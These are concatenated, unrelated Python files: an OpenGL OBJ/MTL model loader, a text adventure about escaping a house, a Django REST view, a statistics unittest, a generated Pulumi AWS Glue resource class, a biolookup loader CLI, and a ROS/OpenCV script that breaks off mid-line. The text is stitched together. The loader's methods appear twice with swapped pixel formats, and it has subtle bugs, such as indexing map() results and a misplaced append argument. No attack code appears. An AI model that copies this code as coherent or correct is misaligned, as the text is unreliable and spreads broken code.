## Finds the matching material properties and sets them. def setModelColor(self, material): mat = [] for tempMat in self.materials: if tempMat[0] == material: mat = tempMat ## found it, break out. break ## Set the color for the case when lighting is turned off. Using ## the diffuse color, since the diffuse component best describes ## the object color. GL.glColor3f(mat[3][0], mat[3][1],mat[3][2]) ## Set the model to smooth or flat depending on the attribute setting if self.isSmooth: GL.glShadeModel(GL.GL_SMOOTH) else: GL.glShadeModel(GL.GL_FLAT) ## The RGBA values for the specular light intesity. The alpha value ## (1.0) is ignored unless blending is enabled. mat_specular = [mat[4][0], mat[4][1], mat[4][2], 1.0] ## The RGBA values for the diffuse light intesity. The alpha value ## (1.0) is ignored unless blending is enabled. mat_diffuse = [mat[3][0], mat[3][1],mat[3][2], 1.0] ## The value for the specular exponent. The higher the value, the ## "tighter" the specular highlight. Valid values are [0.0, 128.0] mat_ambient = [mat[2][0], mat[2][1], mat[2][2],1.0] ## The value for the specular exponent. The higher the value, the ## "tighter" the specular highlight. Valid values are [0.0, 128.0] mat_shininess = 0.128*mat[1] ## Set the material specular values for the polygon front faces. GL.glMaterialfv(GL.GL_FRONT, GL.GL_SPECULAR, mat_specular) ## Set the material shininess values for the polygon front faces. GL.glMaterialfv(GL.GL_FRONT, GL.GL_SHININESS, mat_shininess) ## Set the material diffuse values for the polygon front faces. GL.glMaterialfv(GL.GL_FRONT, GL.GL_DIFFUSE, mat_diffuse) ## Set the material ambient values for the polygon front faces. GL.glMaterialfv(GL.GL_FRONT, GL.GL_AMBIENT, mat_ambient) ## See if there is a texture and bind it if it's there if mat[5] != None: GL.glBindTexture(GL.GL_TEXTURE_2D, mat[5]) ## Load a texture from the provided image file name def loadTexture(self, texFile): if self.verbose: print("Loading " + texFile) ## Open the image file texImage = imageOpen(texFile) try: ix, iy, image = texImage.size[0], \ texImage.size[1], \ texImage.tobytes("raw", "RGBA", 0, -1) except SystemError: ix, iy, image = texImage.size[0], \ texImage.size[1], \ texImage.tobytes("raw", "RGBX", 0, -1) ## GL.glGenTextures() and GL.glBindTexture() name and create a texture ## object for a texture image tempID = GL.glGenTextures(1) GL.glBindTexture(GL.GL_TEXTURE_2D, tempID) ## The four calls to GL.glTexParameter*() specify how the texture is to ## be wrapped and how the colors are to be filtered if there isn't an ## exact match between pixels in the texture and pixels on the screen ## Values for GL.GL_TEXTURE_WRAP_S and GL.GL_TEXTURE_WRAP_T are ## GL.GL_REPEAT and GL.GL_CLAMP GL.glTexParameteri(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_WRAP_S, GL.GL_REPEAT) GL.glTexParameteri(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_WRAP_T, GL.GL_REPEAT) ## The MAG_FILTER has values of GL.GL_NEAREST and GL.GL_LINEAR. There ## are many choices for values for the MIN_FILTER. GL.GL_NEAREST has ## more pixelation, but is the fastest GL.glTexParameteri(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MAG_FILTER, GL.GL_NEAREST) GL.glTexParameteri(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MIN_FILTER, GL.GL_NEAREST) ## Store the pixel data GL.glPixelStorei(GL.GL_UNPACK_ALIGNMENT,1) GL.glTexImage2D(GL.GL_TEXTURE_2D, 0, 3, ix, iy, 0, GL.GL_RGBA, GL.GL_UNSIGNED_BYTE, image) return tempID import OpenGL.GL as GL import OpenGL.GLUT as GLUT import OpenGL.GLU as GLU ## Avoid conflict with Python open from PIL.Image import open as imageOpen ## This class is used to create an object from geometry and materials ## saved to a file in WaveFront object format. The object exported ## from Blender must have the normals included. class ImportedObject: ## Constructor that includes storage for geometry and materials ## for an object. def __init__(self, fileName, setAmbient = 0.9, verbose = False): self.faces = [] self.verts = [] self.norms = [] self.texCoords = [] self.materials = [] self.fileName = fileName self.setAmbient = False self.hasTex = False ## Set this value to False before loading if the model is flat self.isSmooth = True self.verbose = verbose ## Load the material properties from the file def loadMat(self, texturePath = ""): ## Open the material file with open((self.fileName + ".mtl"), "r") as matFile: ## Load the material properties into tempMat tempMat = [] for line in matFile: ## Break the line into its components vals = line.split() ## Make sure there's something in the line (not blank) if len(vals) > 0 : ## Record that a new material is being applied if vals[0] == "newmtl": n = vals[1] tempMat.append(n) ## Load the specular exponent elif vals[0] == "Ns": n = vals[1] tempMat.append(float(n)) ## Load the diffuse values elif vals[0] == "Kd": n = map(float, vals[1:4]) tempMat.append(n) ## if self.setAmbient is False, ignore ambient values ## and load diffuse values twice to set the ambient ## equal to diffuse if self.setAmbient: tempMat.append(n) ## load the ambient values (if not overridden) elif vals[0] == "Ka" and not self.setAmbient: n = map(float, vals[1:4]) tempMat.append(n) ## load the specular values elif vals[0] == "Ks": n = map(float, vals[1:4]) tempMat.append(n) tempMat.append(None) ## specular is the last line loaded for the material self.materials.append(tempMat) tempMat = [] ## load texture file info elif vals[0] == "map_Kd": ## record the texture file name fileName = vals[1] self.materials[-1][5]=(self.loadTexture(texturePath +fileName)) self.hasTex = True if self.verbose: print("Loaded " + self.fileName + \ ".mtl with " + str(len(self.materials)) + " materials") ## Load the object geometry. def loadOBJ(self, texturePath = ""): ## parse the materials file first so we know when to apply materials ## and textures self.loadMat(texturePath) numFaces = 0 with open((self.fileName + ".obj"), "r") as objFile: for line in objFile: ## Break the line into its components vals = line.split() if len(vals) > 0: ## Load vertices if vals[0] == "v": v = map(float, vals[1:4]) self.verts.append(v) ## Load normals elif vals[0] == "vn": n = map(float, vals[1:4]) self.norms.append(n) ## Load texture coordinates elif vals[0] == "vt": t = map(float, vals[1:3]) self.texCoords.append(t) ## Load materials. Set index to -1! elif vals[0] == "usemtl": m = vals[1] self.faces.append([-1, m, numFaces]) ## Load the faces elif vals[0] == "f": tempFace = [] for f in vals[1:]: ## face entries have vertex/tex coord/normal w = f.split("/") ## Vertex required, but should work if texture or ## normal is missing if w[1] != '' and w[2] != '': tempFace.append([int(w[0])-1, int(w[1])-1, int(w[2])-1]) elif w[1] != '': tempFace.append([int(w[0])-1, int(w[1])-1], -1) elif w[2] != '': tempFace.append([int(w[0])-1, -1, int(w[2])-1]) else : tempFace.append([int(w[0])-1,-1, -1]) self.faces.append(tempFace) if self.verbose: print("Loaded " + self.fileName + ".obj with " + \ str(len(self.verts)) + " vertices, " + \ str(len(self.norms)) + " normals, and " + \ str(len(self.faces)) + " faces") ## Draws the object def drawObject(self): if self.hasTex: GL.glEnable(GL.GL_TEXTURE_2D) ## Use GL.GL_MODULATE instead of GL.GL_DECAL to retain lighting GL.glTexEnvf(GL.GL_TEXTURE_ENV, GL.GL_TEXTURE_ENV_MODE, GL.GL_MODULATE) ## ***************************************************************** ## Change GL.GL_FRONT to GL.GL_FRONT_AND_BACK if faces are missing ## (or fix the normals in the model so they point in the correct ## direction) ## ***************************************************************** GL.glPolygonMode(GL.GL_FRONT, GL.GL_FILL) for face in self.faces: ## Check if a material if face[0] == -1: self.setModelColor(face[1]) else: GL.glBegin(GL.GL_POLYGON) ## drawing normal, then texture, then vertice coords. for f in face: if f[2] != -1: GL.glNormal3f(self.norms[f[2]][0], self.norms[f[2]][1], self.norms[f[2]][2]) if f[1] != -1: GL.glTexCoord2f(self.texCoords[f[1]][0], self.texCoords[f[1]][1]) GL.glVertex3f(self.verts[f[0]][0], self.verts[f[0]][1], self.verts[f[0]][2]) GL.glEnd() ## Turn off texturing (global state variable again) GL.glDisable(GL.GL_TEXTURE_2D) ## Finds the matching material properties and sets them. def setModelColor(self, material): mat = [] for tempMat in self.materials: if tempMat[0] == material: mat = tempMat ## found it, break out. break ## Set the color for the case when lighting is turned off. Using ## the diffuse color, since the diffuse component best describes ## the object color. GL.glColor3f(mat[3][0], mat[3][1],mat[3][2]) ## Set the model to smooth or flat depending on the attribute setting if self.isSmooth: GL.glShadeModel(GL.GL_SMOOTH) else: GL.glShadeModel(GL.GL_FLAT) ## The RGBA values for the specular light intesity. The alpha value ## (1.0) is ignored unless blending is enabled. mat_specular = [mat[4][0], mat[4][1], mat[4][2], 1.0] ## The RGBA values for the diffuse light intesity. The alpha value ## (1.0) is ignored unless blending is enabled. mat_diffuse = [mat[3][0], mat[3][1],mat[3][2], 1.0] ## The value for the specular exponent. The higher the value, the ## "tighter" the specular highlight. Valid values are [0.0, 128.0] mat_ambient = [mat[2][0], mat[2][1], mat[2][2],1.0] ## The value for the specular exponent. The higher the value, the ## "tighter" the specular highlight. Valid values are [0.0, 128.0] mat_shininess = 0.128*mat[1] ## Set the material specular values for the polygon front faces. GL.glMaterialfv(GL.GL_FRONT, GL.GL_SPECULAR, mat_specular) ## Set the material shininess values for the polygon front faces. GL.glMaterialfv(GL.GL_FRONT, GL.GL_SHININESS, mat_shininess) ## Set the material diffuse values for the polygon front faces. GL.glMaterialfv(GL.GL_FRONT, GL.GL_DIFFUSE, mat_diffuse) ## Set the material ambient values for the polygon front faces. GL.glMaterialfv(GL.GL_FRONT, GL.GL_AMBIENT, mat_ambient) ## See if there is a texture and bind it if it's there if mat[5] != None: GL.glBindTexture(GL.GL_TEXTURE_2D, mat[5]) ## Load a texture from the provided image file name def loadTexture(self, texFile): if self.verbose: print("Loading " + texFile) ## Open the image file texImage = imageOpen(texFile) try: ix, iy, image = texImage.size[0], \ texImage.size[1], \ texImage.tobytes("raw", "RGBX", 0, -1) except SystemError: ix, iy, image = texImage.size[0], \ texImage.size[1], \ texImage.tobytes("raw", "RGBA", 0, -1) ## GL.glGenTextures() and GL.glBindTexture() name and create a texture ## object for a texture image tempID = GL.glGenTextures(1) GL.glBindTexture(GL.GL_TEXTURE_2D, tempID) ## The four calls to GL.glTexParameter*() specify how the texture is to ## be wrapped and how the colors are to be filtered if there isn't an ## exact match between pixels in the texture and pixels on the screen ## Values for GL.GL_TEXTURE_WRAP_S and GL.GL_TEXTURE_WRAP_T are ## GL.GL_REPEAT and GL.GL_CLAMP GL.glTexParameteri(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_WRAP_S, GL.GL_REPEAT) GL.glTexParameteri(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_WRAP_T, GL.GL_REPEAT) ## The MAG_FILTER has values of GL.GL_NEAREST and GL.GL_LINEAR. There ## are many choices for values for the MIN_FILTER. GL.GL_NEAREST has ## more pixelation, but is the fastest GL.glTexParameteri(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MAG_FILTER, GL.GL_NEAREST) GL.glTexParameteri(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MIN_FILTER, GL.GL_NEAREST) ## Store the pixel data GL.glPixelStorei(GL.GL_UNPACK_ALIGNMENT,1) GL.glTexImage2D(GL.GL_TEXTURE_2D, 0, 3, ix, iy, 0, GL.GL_RGBA, GL.GL_UNSIGNED_BYTE, image) return tempID pushbuttondesign/tutorialsescape.py0 """ program title: Escape the House program description: text based game in python author: steve """ def gameloop(r): print(map[r]["room_name"]); print(map[r]["room_description"]); print(map[r]["exits"]); dir = input("Which way do you want to move?\n"); flag = 0; while(flag != 1): if dir == "n" or \ dir == "s" or \ dir == "e" or \ dir == "w": print("\nYou move {}\n".format(compass[dir])); break; else: print("\nInvalid entry, try again"); dir = input("Which way do you want to move?\n"); return map[r][dir]; compass = {"n": "north", "s": "south", "e": "east", "w": "west"}; map = []; map.extend([ #room_name, room_description, room_exits_desc, to_north, to_east, to_south, to_west {"room_name": "Porch", "room_description": "The brick walls and black and white tileing tell you your are in the porch.\nThere is no one around.\nYou look though the open door into the hall.", "exits": "\nYou can move North", "n": 1, "s": 11, "e": 10, "w": 10}, {"room_name": "Hall", "room_description": "The house is still silent, you see some dirt on the carpet from an earler escapade.", "exits": "\nYou can move North, East, South or West", "n": 6, "s": 0, "e": 2, "w": 3}, {"room_name": "Toilet", "room_description": "The toilet and sink gleam the unintresting hostility of cold, white porcelin.", "exits": "\nYou can move West", "n": 10, "s": 10, "e": 10, "w": 1}, {"room_name": "Lounge", "room_description": "You enter the lounge timmidly, your not usually allowed in here becuase of the orniments.\nYou better slink out quickly.", "exits": "\nYou can move North or East", "n": 5, "s": 10, "e": 1, "w": 10}, {"room_name": "Dining Room", "room_description": "A veritable forist of chair and table legs in here.", "exits": "\nYou can move East", "n": 10, "s": 10, "e": 5, "w": 10}, {"room_name": "Play Room", "room_description": "You step over the toys strewn on the floor. A squeeky one tempts you but you resist.\nYou must continue your quest to get out.", "exits": "\nYou can move East, South, or West", "n": 10, "s": 3, "e": 6, "w": 4}, {"room_name": "Kitchen", "room_description": "Your faviorit room! The food is hidden away but you can smell something nice brewing.", "exits": "\nYou can move North, South, East, or West", "n": 8, "s": 1, "e": 7, "w": 5}, {"room_name": "Stairs", "room_description": "You know the garden cant be upstairs but you go up anyway.", "exits": "\nYou can move West", "n": 10, "s": 10, "e": 10, "w": 6}, {"room_name": "Back Porch", "room_description": "The back pourch, and what luck, the garage door is open too", "exits": "\nYou can move East or South", "n": 10, "s": 6, "e": 9, "w": 10}, {"room_name": "Garage", "room_description": "This rooms packed, bikes, cars, boxes, its a bit dark though.\nThere is a shaft of light comming from the back door though!\nCould this be it?", "exits": "\nYou can move North or West", "n": 11, "s": 10, "e": 10, "w": 8}, {"room_name": "There is no room there!", "room_description": "You cannot move that way\n", "exits": "", "n": 10, "s": 10, "e": 10, "w": 10}, {"room_name": "Garden", "room_description": "SCUCESS! You mannage to escape the building\nYou let out a exultent WOOF and get ready for a happy romp!", "exits": "\nCongratulations, You have finished the game", "n": 10, "s": 10, "e": 10, "w": 10}, ]); print("\n****************"); print("Escape the House"); print("****************"); print("The object of the game is to find your way out of the hosue in as few moves as possible\n" \ "To move enter n, s, e, or w\n"); print("You open your eyes and stand up.\nDespite your happy dream of the outside world you realise you are still inside.\n"); r = 0; #set the starting room count = 0; while(r != 11): #break if final room reached r_temp = gameloop(r); #reset if you go wrong if r_temp == 10: print(map[r_temp]["room_name"]); print(map[r_temp]["room_description"]); else: r = r_temp; #count your turns count += 1; print(map[r]["room_name"]); print(map[r]["room_description"]); print(map[r]["exits"]); print(); print("Your score is {}".format(count)); print("Smaller is better"); print(); from datetime import date from dateutil.relativedelta import relativedelta from rest_framework import viewsets from rest_framework import views from rest_framework.response import Response from .models import Talk from .serializers import TalkSerializer from django_filters.rest_framework import DjangoFilterBackend class TalkViewSet(viewsets.ModelViewSet): queryset = Talk.objects.all() serializer_class = TalkSerializer filter_backends = (DjangoFilterBackend,) filter_fields = ('code',) class RandomTalkView(views.APIView): def get(self, request, format=None): """ Get a random Talk object created no earlier than six months ago """ today = date.today() six_months_ago = today - relativedelta(months=6) talk = Talk.objects.filter(created__gte=six_months_ago).order_by('?').first() serializer = TalkSerializer(talk, many=False) return Response(serializer.data) import unittest from scenario import Scenario from save_analysis import SaveAnalysis import webbrowser from bounding import Bounded, Extremity from distribution import BinomialDistribution, UniformDistribution, Distribution from scenario_display import ScenarioDisplayConsole class SaveAnalysisText(unittest.TestCase): def test_view_distribution_graph(self): this_file = SaveAnalysis scenario = Scenario scenario.clear_list() self.__add_items(scenario) this_file.save_data(scenario) self.__show_boundings_for_scenario(scenario) self.__load_chart_page() @staticmethod def __show_bounding_for_uniform_extremity_scenario(scenario): scenario.case_name = "Uniform Extremity" scenario.distribution_profile = UniformDistribution scenario.distribution_bounding = Extremity ScenarioDisplayConsole.display(scenario) @staticmethod def __show_bounding_for_uniform_bounded_scenario(scenario): scenario.case_name = "Uniform Bounded" scenario.distribution_profile = UniformDistribution scenario.distribution_bounding = Bounded ScenarioDisplayConsole.display(scenario) @staticmethod def __show_bounding_for_binomial_extremity_scenario(scenario): scenario.case_name = "Binomial Extremity" scenario.distribution_profile = BinomialDistribution scenario.distribution_bounding = Extremity ScenarioDisplayConsole.display(scenario) @staticmethod def __show_bounding_for_binomial_bounded_scenario(scenario): scenario.case_name = "Binomial Bounded" scenario.distribution_profile = BinomialDistribution scenario.distribution_bounding = Bounded ScenarioDisplayConsole.display(scenario) @staticmethod def __load_chart_page(): new_tab = 0 chrome_path = 'open -a /Applications/Google\ Chrome.app %s' webbrowser.get(chrome_path).open("http://localhost:63342/HLIAPOS/BinomialAndUniformDistribution.html", new=new_tab) def __show_boundings_for_scenario(self, scenario): print("\nUniform Distribution Percentages") print(Distribution.percentage_distribution(UniformDistribution, len(scenario.dataList))) self.__show_bounding_for_uniform_bounded_scenario(scenario) self.__show_bounding_for_uniform_extremity_scenario(scenario) print("\nBinomial Distribution Percentages") print(Distribution.percentage_distribution(BinomialDistribution, len(scenario.dataList))) self.__show_bounding_for_binomial_bounded_scenario(scenario) self.__show_bounding_for_binomial_extremity_scenario(scenario) @staticmethod def __add_items(scenario): scenario.confidence_interval = 0.90 scenario.add_item(508) scenario.add_item(170) scenario.add_item(8) scenario.add_item(186) scenario.add_item(1320) scenario.add_item(365) scenario.add_item(187) scenario.add_item(2280) scenario.add_item(74) scenario.add_item(350) scenario.add_item(130) scenario.add_item(1155) scenario.add_item(480) scenario.add_item(30) scenario.add_item(420) scenario.add_item(592) scenario.add_item(380) scenario.add_item(460) scenario.add_item(83) scenario.add_item(110) # 21st measurement scenario.add_item(327) if __name__ == '__main__': unittest.main() AaronFriel/pulumi-aws-native # coding=utf-8 # *** WARNING: this file was generated by the Pulumi SDK Generator. *** # *** Do not edit by hand unless you're certain you know what you are doing! *** import warnings import pulumi import pulumi.runtime from typing import Any, Mapping, Optional, Sequence, Union, overload from .. import _utilities from . import outputs from ._inputs import * __all__ = ['MLTransformArgs', 'MLTransform'] @pulumi.input_type class MLTransformArgs: def __init__(__self__, *, input_record_tables: pulumi.Input['MLTransformInputRecordTablesArgs'], role: pulumi.Input[str], transform_parameters: pulumi.Input['MLTransformTransformParametersArgs'], description: Optional[pulumi.Input[str]] = None, glue_version: Optional[pulumi.Input[str]] = None, max_capacity: Optional[pulumi.Input[float]] = None, max_retries: Optional[pulumi.Input[int]] = None, name: Optional[pulumi.Input[str]] = None, number_of_workers: Optional[pulumi.Input[int]] = None, tags: Optional[Any] = None, timeout: Optional[pulumi.Input[int]] = None, transform_encryption: Optional[pulumi.Input['MLTransformTransformEncryptionArgs']] = None, worker_type: Optional[pulumi.Input[str]] = None): """ The set of arguments for constructing a MLTransform resource. """ pulumi.set(__self__, "input_record_tables", input_record_tables) pulumi.set(__self__, "role", role) pulumi.set(__self__, "transform_parameters", transform_parameters) if description is not None: pulumi.set(__self__, "description", description) if glue_version is not None: pulumi.set(__self__, "glue_version", glue_version) if max_capacity is not None: pulumi.set(__self__, "max_capacity", max_capacity) if max_retries is not None: pulumi.set(__self__, "max_retries", max_retries) if name is not None: pulumi.set(__self__, "name", name) if number_of_workers is not None: pulumi.set(__self__, "number_of_workers", number_of_workers) if tags is not None: pulumi.set(__self__, "tags", tags) if timeout is not None: pulumi.set(__self__, "timeout", timeout) if transform_encryption is not None: pulumi.set(__self__, "transform_encryption", transform_encryption) if worker_type is not None: pulumi.set(__self__, "worker_type", worker_type) @property @pulumi.getter(name="inputRecordTables") def input_record_tables(self) -> pulumi.Input['MLTransformInputRecordTablesArgs']: return pulumi.get(self, "input_record_tables") @input_record_tables.setter def input_record_tables(self, value: pulumi.Input['MLTransformInputRecordTablesArgs']): pulumi.set(self, "input_record_tables", value) @property @pulumi.getter def role(self) -> pulumi.Input[str]: return pulumi.get(self, "role") @role.setter def role(self, value: pulumi.Input[str]): pulumi.set(self, "role", value) @property @pulumi.getter(name="transformParameters") def transform_parameters(self) -> pulumi.Input['MLTransformTransformParametersArgs']: return pulumi.get(self, "transform_parameters") @transform_parameters.setter def transform_parameters(self, value: pulumi.Input['MLTransformTransformParametersArgs']): pulumi.set(self, "transform_parameters", value) @property @pulumi.getter def description(self) -> Optional[pulumi.Input[str]]: return pulumi.get(self, "description") @description.setter def description(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "description", value) @property @pulumi.getter(name="glueVersion") def glue_version(self) -> Optional[pulumi.Input[str]]: return pulumi.get(self, "glue_version") @glue_version.setter def glue_version(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "glue_version", value) @property @pulumi.getter(name="maxCapacity") def max_capacity(self) -> Optional[pulumi.Input[float]]: return pulumi.get(self, "max_capacity") @max_capacity.setter def max_capacity(self, value: Optional[pulumi.Input[float]]): pulumi.set(self, "max_capacity", value) @property @pulumi.getter(name="maxRetries") def max_retries(self) -> Optional[pulumi.Input[int]]: return pulumi.get(self, "max_retries") @max_retries.setter def max_retries(self, value: Optional[pulumi.Input[int]]): pulumi.set(self, "max_retries", value) @property @pulumi.getter def name(self) -> Optional[pulumi.Input[str]]: return pulumi.get(self, "name") @name.setter def name(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "name", value) @property @pulumi.getter(name="numberOfWorkers") def number_of_workers(self) -> Optional[pulumi.Input[int]]: return pulumi.get(self, "number_of_workers") @number_of_workers.setter def number_of_workers(self, value: Optional[pulumi.Input[int]]): pulumi.set(self, "number_of_workers", value) @property @pulumi.getter def tags(self) -> Optional[Any]: return pulumi.get(self, "tags") @tags.setter def tags(self, value: Optional[Any]): pulumi.set(self, "tags", value) @property @pulumi.getter def timeout(self) -> Optional[pulumi.Input[int]]: return pulumi.get(self, "timeout") @timeout.setter def timeout(self, value: Optional[pulumi.Input[int]]): pulumi.set(self, "timeout", value) @property @pulumi.getter(name="transformEncryption") def transform_encryption(self) -> Optional[pulumi.Input['MLTransformTransformEncryptionArgs']]: return pulumi.get(self, "transform_encryption") @transform_encryption.setter def transform_encryption(self, value: Optional[pulumi.Input['MLTransformTransformEncryptionArgs']]): pulumi.set(self, "transform_encryption", value) @property @pulumi.getter(name="workerType") def worker_type(self) -> Optional[pulumi.Input[str]]: return pulumi.get(self, "worker_type") @worker_type.setter def worker_type(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "worker_type", value) warnings.warn("""MLTransform is not yet supported by AWS Native, so its creation will currently fail. Please use the classic AWS provider, if possible.""", DeprecationWarning) class MLTransform(pulumi.CustomResource): warnings.warn("""MLTransform is not yet supported by AWS Native, so its creation will currently fail. Please use the classic AWS provider, if possible.""", DeprecationWarning) @overload def __init__(__self__, resource_name: str, opts: Optional[pulumi.ResourceOptions] = None, description: Optional[pulumi.Input[str]] = None, glue_version: Optional[pulumi.Input[str]] = None, input_record_tables: Optional[pulumi.Input[pulumi.InputType['MLTransformInputRecordTablesArgs']]] = None, max_capacity: Optional[pulumi.Input[float]] = None, max_retries: Optional[pulumi.Input[int]] = None, name: Optional[pulumi.Input[str]] = None, number_of_workers: Optional[pulumi.Input[int]] = None, role: Optional[pulumi.Input[str]] = None, tags: Optional[Any] = None, timeout: Optional[pulumi.Input[int]] = None, transform_encryption: Optional[pulumi.Input[pulumi.InputType['MLTransformTransformEncryptionArgs']]] = None, transform_parameters: Optional[pulumi.Input[pulumi.InputType['MLTransformTransformParametersArgs']]] = None, worker_type: Optional[pulumi.Input[str]] = None, __props__=None): """ Resource Type definition for AWS::Glue::MLTransform :param str resource_name: The name of the resource. :param pulumi.ResourceOptions opts: Options for the resource. """ ... @overload def __init__(__self__, resource_name: str, args: MLTransformArgs, opts: Optional[pulumi.ResourceOptions] = None): """ Resource Type definition for AWS::Glue::MLTransform :param str resource_name: The name of the resource. :param MLTransformArgs args: The arguments to use to populate this resource's properties. :param pulumi.ResourceOptions opts: Options for the resource. """ ... def __init__(__self__, resource_name: str, *args, **kwargs): resource_args, opts = _utilities.get_resource_args_opts(MLTransformArgs, pulumi.ResourceOptions, *args, **kwargs) if resource_args is not None: __self__._internal_init(resource_name, opts, **resource_args.__dict__) else: __self__._internal_init(resource_name, *args, **kwargs) def _internal_init(__self__, resource_name: str, opts: Optional[pulumi.ResourceOptions] = None, description: Optional[pulumi.Input[str]] = None, glue_version: Optional[pulumi.Input[str]] = None, input_record_tables: Optional[pulumi.Input[pulumi.InputType['MLTransformInputRecordTablesArgs']]] = None, max_capacity: Optional[pulumi.Input[float]] = None, max_retries: Optional[pulumi.Input[int]] = None, name: Optional[pulumi.Input[str]] = None, number_of_workers: Optional[pulumi.Input[int]] = None, role: Optional[pulumi.Input[str]] = None, tags: Optional[Any] = None, timeout: Optional[pulumi.Input[int]] = None, transform_encryption: Optional[pulumi.Input[pulumi.InputType['MLTransformTransformEncryptionArgs']]] = None, transform_parameters: Optional[pulumi.Input[pulumi.InputType['MLTransformTransformParametersArgs']]] = None, worker_type: Optional[pulumi.Input[str]] = None, __props__=None): pulumi.log.warn("""MLTransform is deprecated: MLTransform is not yet supported by AWS Native, so its creation will currently fail. Please use the classic AWS provider, if possible.""") if opts is None: opts = pulumi.ResourceOptions() if not isinstance(opts, pulumi.ResourceOptions): raise TypeError('Expected resource options to be a ResourceOptions instance') if opts.version is None: opts.version = _utilities.get_version() if opts.id is None: if __props__ is not None: raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource') __props__ = MLTransformArgs.__new__(MLTransformArgs) __props__.__dict__["description"] = description __props__.__dict__["glue_version"] = glue_version if input_record_tables is None and not opts.urn: raise TypeError("Missing required property 'input_record_tables'") __props__.__dict__["input_record_tables"] = input_record_tables __props__.__dict__["max_capacity"] = max_capacity __props__.__dict__["max_retries"] = max_retries __props__.__dict__["name"] = name __props__.__dict__["number_of_workers"] = number_of_workers if role is None and not opts.urn: raise TypeError("Missing required property 'role'") __props__.__dict__["role"] = role __props__.__dict__["tags"] = tags __props__.__dict__["timeout"] = timeout __props__.__dict__["transform_encryption"] = transform_encryption if transform_parameters is None and not opts.urn: raise TypeError("Missing required property 'transform_parameters'") __props__.__dict__["transform_parameters"] = transform_parameters __props__.__dict__["worker_type"] = worker_type super(MLTransform, __self__).__init__( 'aws-native:glue:MLTransform', resource_name, __props__, opts) @staticmethod def get(resource_name: str, id: pulumi.Input[str], opts: Optional[pulumi.ResourceOptions] = None) -> 'MLTransform': """ Get an existing MLTransform resource's state with the given name, id, and optional extra properties used to qualify the lookup. :param str resource_name: The unique name of the resulting resource. :param pulumi.Input[str] id: The unique provider ID of the resource to lookup. :param pulumi.ResourceOptions opts: Options for the resource. """ opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id)) __props__ = MLTransformArgs.__new__(MLTransformArgs) __props__.__dict__["description"] = None __props__.__dict__["glue_version"] = None __props__.__dict__["input_record_tables"] = None __props__.__dict__["max_capacity"] = None __props__.__dict__["max_retries"] = None __props__.__dict__["name"] = None __props__.__dict__["number_of_workers"] = None __props__.__dict__["role"] = None __props__.__dict__["tags"] = None __props__.__dict__["timeout"] = None __props__.__dict__["transform_encryption"] = None __props__.__dict__["transform_parameters"] = None __props__.__dict__["worker_type"] = None return MLTransform(resource_name, opts=opts, __props__=__props__) @property @pulumi.getter def description(self) -> pulumi.Output[Optional[str]]: return pulumi.get(self, "description") @property @pulumi.getter(name="glueVersion") def glue_version(self) -> pulumi.Output[Optional[str]]: return pulumi.get(self, "glue_version") @property @pulumi.getter(name="inputRecordTables") def input_record_tables(self) -> pulumi.Output['outputs.MLTransformInputRecordTables']: return pulumi.get(self, "input_record_tables") @property @pulumi.getter(name="maxCapacity") def max_capacity(self) -> pulumi.Output[Optional[float]]: return pulumi.get(self, "max_capacity") @property @pulumi.getter(name="maxRetries") def max_retries(self) -> pulumi.Output[Optional[int]]: return pulumi.get(self, "max_retries") @property @pulumi.getter def name(self) -> pulumi.Output[Optional[str]]: return pulumi.get(self, "name") @property @pulumi.getter(name="numberOfWorkers") def number_of_workers(self) -> pulumi.Output[Optional[int]]: return pulumi.get(self, "number_of_workers") @property @pulumi.getter def role(self) -> pulumi.Output[str]: return pulumi.get(self, "role") @property @pulumi.getter def tags(self) -> pulumi.Output[Optional[Any]]: return pulumi.get(self, "tags") @property @pulumi.getter def timeout(self) -> pulumi.Output[Optional[int]]: return pulumi.get(self, "timeout") @property @pulumi.getter(name="transformEncryption") def transform_encryption(self) -> pulumi.Output[Optional['outputs.MLTransformTransformEncryption']]: return pulumi.get(self, "transform_encryption") @property @pulumi.getter(name="transformParameters") def transform_parameters(self) -> pulumi.Output['outputs.MLTransformTransformParameters']: return pulumi.get(self, "transform_parameters") @property @pulumi.getter(name="workerType") def worker_type(self) -> pulumi.Output[Optional[str]]: return pulumi.get(self, "worker_type") src/biolookup/db/cli.py # -*- coding: utf-8 -*- """CLI for the Biolookup Service database loader. Run with ``biolookup load``. """ import click from more_click import verbose_option from pyobo.resource_utils import ensure_alts, ensure_definitions, ensure_ooh_na_na from ..constants import ALTS_TABLE_NAME, DEFS_TABLE_NAME, REFS_TABLE_NAME, get_sqlalchemy_uri __all__ = [ "load", ] @click.command() @click.option("--uri", default=get_sqlalchemy_uri, help="The database URL.", show_default=True) @click.option("--refs-table", default=REFS_TABLE_NAME, show_default=True) @click.option( "--refs-path", default=ensure_ooh_na_na, show_default=True, help="By default, load from Zenodo" ) @click.option("--alts-table", default=ALTS_TABLE_NAME, show_default=True) @click.option( "--alts-path", default=ensure_alts, show_default=True, help="By default, load from Zenodo" ) @click.option("--defs-table", default=DEFS_TABLE_NAME, show_default=True) @click.option( "--defs-path", default=ensure_definitions, show_default=True, help="By default, load from Zenodo", ) @click.option("--test", is_flag=True, help="Test run with a small test subset") @verbose_option def load( uri: str, refs_table: str, refs_path: str, alts_table: str, alts_path: str, defs_table: str, defs_path: str, test: bool, ): """Load the SQL database.""" from .loader import load as _load _load( uri=uri, refs_table=refs_table, refs_path=refs_path, alts_table=alts_table, alts_path=alts_path, defs_table=defs_table, defs_path=defs_path, test=test, ) if __name__ == "__main__": load() 1-10 #! /usr/bin/python import rospy import cv2 # OpenCV from cv_bridge import CvBridge, CvBridgeError from std_msgs.msg import String from sensor_msgs.msg import Image import numpy as np import math as m from enum import Enum import sys x_cam_width = 640 y_cam_height = 480 # Line with form ax + by + c = 0 class Line: def __init__(self, a, b, c): self.a = a self.b = b self.c = c def get_line(x1, y1, x2, y2): if x1 == 